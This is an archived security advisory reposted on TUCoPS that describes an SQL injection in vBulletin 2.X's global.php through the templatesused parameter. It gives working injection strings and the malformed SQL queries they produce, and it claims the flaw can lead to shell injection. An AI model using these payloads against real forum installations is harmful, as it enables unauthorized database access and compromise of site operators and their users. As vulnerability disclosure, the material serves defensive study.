TUCoPS :: Web BBS :: Frequently Exploited :: b06-4915.htm

Vbulletin 2.X sql injection
Vbulletin 2.X sql injection
Vbulletin 2.X sql injection



Hello,,=0D
=0D
Vbulletin 2.X sql injection=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
This is sql injection in vbulletin systems=0D
=0D
the injection is in the global.php file=0D
=0D
we can use it =0D
=0D
global.php?templatesused=))/*=0D
=0D
the query will be =0D
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid=0D
=0D
global.php?templatesused=nn,dd,'))/*=0D
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid=0D
=0D
It Can be used as shell injection=0D
=0D
Tested on VB 2.3.X and other versions are injected ..(2.X)=0D
=0D
#WwW.SoQoR.NeT 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH